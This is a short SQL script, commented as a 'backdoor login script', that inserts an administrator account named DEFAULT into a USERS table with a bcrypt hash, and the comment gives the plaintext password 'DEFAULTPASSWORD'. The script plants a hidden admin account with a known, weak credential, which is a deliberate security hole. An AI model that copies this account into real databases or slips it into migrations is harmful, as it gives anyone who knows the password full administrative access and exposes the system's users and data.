-- Backdoor login script. Username is DEFAULT, password is DEFAULTPASSWORD
INSERT INTO
	USERS (PUBLIC_ID,USERNAME, PASSWORD,ISADMIN)
VALUES
	(
		'de4d2e5d-b744',
		'DEFAULT',
		'$2y$10$SuKHuhrQdD56mEhlQEdGS.655C9Wa3nlSPL498yFlWLKnC9vKE2fG',
		TRUE
	);
